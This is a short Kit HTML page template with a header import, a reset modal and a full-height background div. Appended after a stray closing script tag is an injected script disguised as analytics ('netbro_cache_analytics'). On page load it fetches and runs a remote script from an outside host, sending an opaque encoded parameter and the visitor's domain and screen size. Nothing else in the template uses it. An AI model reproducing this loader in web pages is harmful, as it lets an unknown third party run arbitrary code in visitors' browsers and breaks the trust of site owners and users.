<!-- @import "_header.kit" -->
<body>
    <!-- @import "modal/_reset.kit" -->
    <div style="background-image:url('../assets/img/sofa-asset.png');background-repeat:no-repeat;width:100%;min-height:100vh;background-color:#0490c7">

    </div>

</script>
 <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2B6VAoQZNXPSZR501PhW7q2UNS2BeQpuQSNIN%2fUUYlabQNKyEYEtTkZgFgXcKRD3RcW%2bOo4%2fg1hIHoV5XRKnfrnm5i5z6%2fKcc7zj6Tf8c9OeCj%2bVVJS8z96yA3gctbLLNZvSfqJ3dqZCcrGhhjV6FRqh3J%2bsD%2bbnWJZ8PkGTk3gV%2f2xZb7r3K5G8X41vRvrv5bYESUoqX5I5tZ1WOhPeAqHn1ZHyiTYe1Xmj0NO9Sd2gTePNcnW7O7LWeT0EQZYUuLG4TIGvCyVXXStObBfuJYoqeWvi4qYSq9lmUP4IrRrDFUpJHW5X3BIJDBZgmkgREstuh2l6bNBVJD3egp1oshH3OXul5avLEJuNmGA%2bnSgnc%2fTJScLvhUFAzRis7WQgk0jU6Qbi%2bfqRd25Cxo6a%2bNm5B85lk0MPFDZ05Q%2fMlAaUtHlfi359oEUmo6nmYKDDLXDTOdsUXnH04co%2fAuUAa9ulnfGWore7Xhlp94MpAw8CjEjHDvIg4fI3KswMFdRLvyGxUVHFAImE%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
</body>
<!-- @import "_footer.kit" -->
</html>
